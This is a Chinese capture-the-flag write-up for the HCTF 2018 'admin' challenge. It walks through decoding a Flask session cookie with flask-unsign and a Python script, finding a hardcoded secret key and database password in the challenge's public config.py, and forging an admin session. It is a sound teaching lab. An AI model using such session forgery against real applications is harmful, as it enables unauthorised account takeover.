[HCTF 2018]admin

[HCTF 2018]admin

题目进去是一个登录框，尝试用admin账号万能密码登录一下发现不行

有个注册页面注册一个账号登录

试试sql二次注入，好像有waf过滤了" ’ "

查看页面源码提示

查看cookie有个session，应该是让我们伪造flask session
可以用flask-unsign解密

flask-unsign --cookie "cookie"

也可以用网上的脚本解密

import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before decoding the payload')
    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

{'_fresh': True, '_id':b'6a91996d853b42c99629872c80464112e8e34b543018fe86067d435c184f1
8a62bef4554b42d24eebc61721b49d11ea18d9ed41d0989360a893824ca874ef1a8', 'csrf_token': b'feb0d89361f5c5a0d846e4f6f5702e505ab69ed8', 'name': 'admim', 'user_id': '13'}

但是不知道secret_key

尝试暴力破解，破解不出来

---

看了其他师傅wp知道在change password页面有源码地址https://github.com/woadsl1234/hctf_flask

看config.py有secret_key

import os

class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

用flask-unsign加密直接覆盖原来的session就可以拿到flag了

flask-unsign链接(里面有安装和使用教程):https://github.com/Paradoxis/Flask-Unsign

附上我的个人博客